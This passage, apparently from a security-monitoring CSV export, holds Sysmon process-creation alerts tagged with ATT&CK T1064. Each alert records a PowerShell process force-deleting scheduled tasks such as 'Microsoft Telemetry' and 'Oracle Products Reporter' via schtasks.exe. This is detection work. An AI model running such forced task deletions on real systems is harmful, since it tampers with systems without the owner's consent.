Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.299",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.050 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001078d22e00} +ProcessId: 2492 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.052844200Z"",""eventRecordID"":""3545"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.050\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001078d22e00}\r\nProcessId: 2492\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.050"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001078d22e00}"",""processId"":""2492"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.287",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.994 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ccf2e00} +ProcessId: 5952 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.997405700Z"",""eventRecordID"":""3544"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.994\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ccf2e00}\r\nProcessId: 5952\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.994"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-00105ccf2e00}"",""processId"":""5952"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.265",14,"ATT&CK T1064: Windows 
Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.955 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001084cd2e00} +ProcessId: 1664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.961710400Z"",""eventRecordID"":""3543"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.955\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001084cd2e00}\r\nProcessId: 1664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.955"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001084cd2e00}"",""processId"":""1664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.250",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.917 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010f4cb2e00} +ProcessId: 5660 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.919935100Z"",""eventRecordID"":""3542"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.917\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010f4cb2e00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.917"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-0010f4cb2e00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.239",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.852 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001054ca2e00} +ProcessId: 5592 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.857282500Z"",""eventRecordID"":""3541"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.852\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001054ca2e00}\r\nProcessId: 5592\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: 
\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.852"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001054ca2e00}"",""processId"":""5592"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.207",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.795 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001072c82e00} +ProcessId: 3880 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.823449600Z"",""eventRecordID"":""3540"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.795\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001072c82e00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.795"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001072c82e00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 